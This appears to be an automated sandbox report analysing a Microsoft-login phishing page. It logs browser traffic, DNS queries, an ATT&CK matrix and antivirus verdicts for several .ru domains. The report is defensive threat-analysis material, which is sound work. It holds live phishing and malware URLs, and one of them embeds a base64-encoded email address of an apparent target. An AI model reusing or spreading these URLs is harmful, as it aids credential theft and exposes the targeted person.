Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/e0c90b6a3ed1/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/7g7ou/0x4AAAAAAA0MDA1Jbl1ciyqP/auto/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://guf1.xemirax.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=902b4be51ba27c69&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/7g7ou/0x4AAAAAAA0MDA1Jbl1ciyqP/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/7g7ou/0x4AAAAAAA0MDA1Jbl1ciyqP/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: guf1.xemirax.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://guf1.xemirax.ru/6XAVE/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlA5K2E4Ti9mZENIS3lsQXVLVGdHL3c9PSIsInZhbHVlIjoiUThJL3ZoV1R3aXU5U0lvT0lWaFcrMGZiK0VVc0JaZkUvakxiNk1FdE5mOXZzNGJxdTNEK0ZLUllmQURxejNmRjd5M0JqWUF6bFMxMjJLdVJTd2JhdzlrTFphUW1OVW5GTEFQV1Y4QldNemVReVJNbzdZSGwrOThyTXMrMTNwSXgiLCJtYWMiOiJmZDdiYzAzMTY3OTUwYTFkZmZlM2MxYTY2MmI1MTVjYzc5ODc2MjBmZTQ3NzAwMTNkOWMzYmI3ZTkwMjkzNzI5IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlczZGtTbnF6S2x2OHgwTnF2WStTN3c9PSIsInZhbHVlIjoidmxMaGtSQStYdnVCL3BDRnJFeXNVOExZMTZyZG13T1IwYUhUK1RXaEVrWi9ZRkxUKy83YzJVaTFhblBpdTFUN013SHNJRE5jWnFCbWtqdlRHY2JQUWk5b3pKd1laMGFtdlVndVIrZm5sRWRLNmttWGFLNmxOdE4rdzdEcStWVUwiLCJtYWMiOiJlZjg1MThhNmQzODVlNWY4ODRmMDUyOWMzODdjMmQxYWFhOTk3MGZhMWIzNDMyOGEzOTc3YzI5M2I3ZjM1MDE2IiwidGFnIjoiIn0%3D
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=902b4be51ba27c69&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/987784403:1736998059:j2mCdESRnQ8yAuLeOGvba0XQvnpuDmbh_9ABveMbcN0/902b4be51ba27c69/vbgMLT9MxL8q4zhAdo_qwd.NQaOTep2gg5XAtNTcCio-1737001052-1.1.1.1-m_P7qnsuqumSsU9TuvygpI799LfIg6Lk.JQ83Ib7Jt7nwJnE7SlCIvFSZYB80Ubu HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/pat/902b4be51ba27c69/1737001055934/36f62fcfb6f95c96a2b2b00887c1bcc63a0f7e0720358c000f011a9560ba8db2/gwoEUwYPSddrPVq HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/7g7ou/0x4AAAAAAA0MDA1Jbl1ciyqP/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/902b4be51ba27c69/1737001055937/ICE5gX1v93RNlWk HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/7g7ou/0x4AAAAAAA0MDA1Jbl1ciyqP/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/902b4be51ba27c69/1737001055937/ICE5gX1v93RNlWk HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/987784403:1736998059:j2mCdESRnQ8yAuLeOGvba0XQvnpuDmbh_9ABveMbcN0/902b4be51ba27c69/vbgMLT9MxL8q4zhAdo_qwd.NQaOTep2gg5XAtNTcCio-1737001052-1.1.1.1-m_P7qnsuqumSsU9TuvygpI799LfIg6Lk.JQ83Ib7Jt7nwJnE7SlCIvFSZYB80Ubu HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/987784403:1736998059:j2mCdESRnQ8yAuLeOGvba0XQvnpuDmbh_9ABveMbcN0/902b4be51ba27c69/vbgMLT9MxL8q4zhAdo_qwd.NQaOTep2gg5XAtNTcCio-1737001052-1.1.1.1-m_P7qnsuqumSsU9TuvygpI799LfIg6Lk.JQ83Ib7Jt7nwJnE7SlCIvFSZYB80Ubu HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /478252250458126598869NAvKmLJHHIDCBIGVWTZZDXTZQNQJWSQOLATPKBEJADGSYPAIIHZIFXUZZGMEARM HTTP/1.1Host: dbepc3rsodj1opbh9d5mekhhkvvbkxavf1ql6lcv9b7jldnqxtdykt.ivertoneym.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://guf1.xemirax.ruSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://guf1.xemirax.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /478252250458126598869NAvKmLJHHIDCBIGVWTZZDXTZQNQJWSQOLATPKBEJADGSYPAIIHZIFXUZZGMEARM HTTP/1.1Host: dbepc3rsodj1opbh9d5mekhhkvvbkxavf1ql6lcv9b7jldnqxtdykt.ivertoneym.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: guf1.xemirax.ru
Source: global trafficDNS traffic detected: DNS query: code.jquery.com
Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: dbepc3rsodj1opbh9d5mekhhkvvbkxavf1ql6lcv9b7jldnqxtdykt.ivertoneym.ru
Source: global trafficDNS traffic detected: DNS query: login.microsoftonline.com
Source: global trafficDNS traffic detected: DNS query: www.office.com
Source: global trafficDNS traffic detected: DNS query: aadcdn.msftauth.net
Source: global trafficDNS traffic detected: DNS query: identity.nel.measure.office.net
Source: unknownHTTP traffic detected: POST /cdn-cgi/challenge-platform/h/b/flow/ov1/987784403:1736998059:j2mCdESRnQ8yAuLeOGvba0XQvnpuDmbh_9ABveMbcN0/902b4be51ba27c69/vbgMLT9MxL8q4zhAdo_qwd.NQaOTep2gg5XAtNTcCio-1737001052-1.1.1.1-m_P7qnsuqumSsU9TuvygpI799LfIg6Lk.JQ83Ib7Jt7nwJnE7SlCIvFSZYB80Ubu HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveContent-Length: 3171sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Content-type: application/x-www-form-urlencodedCF-Chl-RetryAttempt: 0sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36CF-Challenge: vbgMLT9MxL8q4zhAdo_qwd.NQaOTep2gg5XAtNTcCio-1737001052-1.1.1.1-m_P7qnsuqumSsU9TuvygpI799LfIg6Lk.JQ83Ib7Jt7nwJnE7SlCIvFSZYB80Ubusec-ch-ua-platform: "Windows"Accept: */*Origin: https://challenges.cloudflare.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/7g7ou/0x4AAAAAAA0MDA1Jbl1ciyqP/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 16 Jan 2025 04:17:34 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8sCMTUMDG2VsfSdc3ArV%2Br%2FNRadCkdMeik9Ze8DFnn%2B1n9SThKYUV9t1cWZVVh6M%2BQ892%2BqGUJxLthCzBZ22k5KIYAMwDI0JePi0fRnazvWXNVBkxZzUuyN0DqI9ZA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=5024&min_rtt=5004&rtt_var=1448&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2822&recv_bytes=2227&delivery_rate=551510&cwnd=32&unsent_bytes=0&cid=3b6c5cda120f0a7b&ts=147&x=0"CF-Cache-Status: EXPIREDServer: cloudflareCF-RAY: 902b4beb79dc3ad6-IADserver-timing: cfL4;desc="?proto=TCP&rtt=8487&min_rtt=8452&rtt_var=3240&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2822&recv_bytes=1893&delivery_rate=334287&cwnd=32&unsent_bytes=0&cid=df7a67d35900cede&ts=3967&x=0"
Source: chromecache_69.2.dr, chromecache_77.2.drString found in binary or memory: https://login.microsoftonline.com
Source: chromecache_69.2.dr, chromecache_77.2.drString found in binary or memory: https://login.windows-ppe.net
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49897
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
Source: classification engineClassification label: mal60.win@20/68@36/11
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2088 --field-trial-handle=2028,i,18349187125816004282,11798271586635004121,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://guf1.xemirax.ru/6XAVE/#S#ZWRtb25kLmxlZUBpbm5vY2FwLmNvbQ=="
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2088 --field-trial-handle=2028,i,18349187125816004282,11798271586635004121,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
Browser Extensions
1
Process Injection
1
Process Injection
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
https://guf1.xemirax.ru/6XAVE/#S#ZWRtb25kLmxlZUBpbm5vY2FwLmNvbQ==100%Avira URL Cloudphishing
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://guf1.xemirax.ru/favicon.ico100%Avira URL Cloudphishing
https://guf1.xemirax.ru/6XAVE/100%Avira URL Cloudphishing
https://dbepc3rsodj1opbh9d5mekhhkvvbkxavf1ql6lcv9b7jldnqxtdykt.ivertoneym.ru/478252250458126598869NAvKmLJHHIDCBIGVWTZZDXTZQNQJWSQOLATPKBEJADGSYPAIIHZIFXUZZGMEARM100%Avira URL Cloudmalware
NameIPActiveMaliciousAntivirus DetectionReputation
guf1.xemirax.ru
104.21.85.129
truetrue
    unknown
    a.nel.cloudflare.com
    35.190.80.1
    truefalse
      high
      code.jquery.com
      151.101.130.137
      truefalse
        high
        dbepc3rsodj1opbh9d5mekhhkvvbkxavf1ql6lcv9b7jldnqxtdykt.ivertoneym.ru
        104.21.42.208
        truefalse
          unknown
          cdnjs.cloudflare.com
          104.17.25.14
          truefalse
            high
            s-part-0036.t-0009.t-msedge.net
            13.107.246.64
            truefalse
              high
              challenges.cloudflare.com
              104.18.94.41
              truefalse
                high
                s-part-0017.t-0009.t-msedge.net
                13.107.246.45
                truefalse
                  high
                  www.google.com
                  216.58.206.36
                  truefalse
                    high
                    www.office.com
                    unknown
                    unknownfalse
                      high
                      identity.nel.measure.office.net
                      unknown
                      unknownfalse
                        high
                        aadcdn.msftauth.net
                        unknown
                        unknownfalse
                          high
                          login.microsoftonline.com
                          unknown
                          unknownfalse
                            high
                            NameMaliciousAntivirus DetectionReputation
                            https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1false
                              high
                              https://a.nel.cloudflare.com/report/v4?s=8sCMTUMDG2VsfSdc3ArV%2Br%2FNRadCkdMeik9Ze8DFnn%2B1n9SThKYUV9t1cWZVVh6M%2BQ892%2BqGUJxLthCzBZ22k5KIYAMwDI0JePi0fRnazvWXNVBkxZzUuyN0DqI9ZA%3D%3Dfalse
                                high
                                https://code.jquery.com/jquery-3.6.0.min.jsfalse
                                  high
                                  https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638725978701807755.NjMwMWMzMWYtYzRiZC00MjU5LWFhZDYtZTllZTFiNDBmYWRkYzkwZDVjZTAtNmQ0Ni00N2ZmLTlkMGUtNGUzZjZiYjYzYzI5&ui_locales=en-US&mkt=en-US&client-request-id=a83c7cd6-0ef7-4f5c-b422-465ad1476c41&state=PLuy4BDkR9twFoiS38LpOjRIwN6m6a6267s-UEndqo6H6I1ODEx-YbytuDqPcYgAXGUL4i4DUKihcoXHfTBTSLghduqJ6Ksd-8BCGCioOnXQBjq0wa8pXT6D8rtlSfILZv5WLtxNhK5s7CohujKmxL-tjejcLFYSEL8BHyOQ0mcG0mXVlre_O80n7gZRoYDlqF05MrYOf8DW9ukHvzJFQd7eTdpb9PlzjSlIc_rmqotJWbTwWvVUc73VOZuXXjMlqCN786ShqLGXWUgZRgAxIw&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0false
                                    high
                                    https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.jsfalse
                                      high
                                      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/pat/902b4be51ba27c69/1737001055934/36f62fcfb6f95c96a2b2b00887c1bcc63a0f7e0720358c000f011a9560ba8db2/gwoEUwYPSddrPVqfalse
                                        high
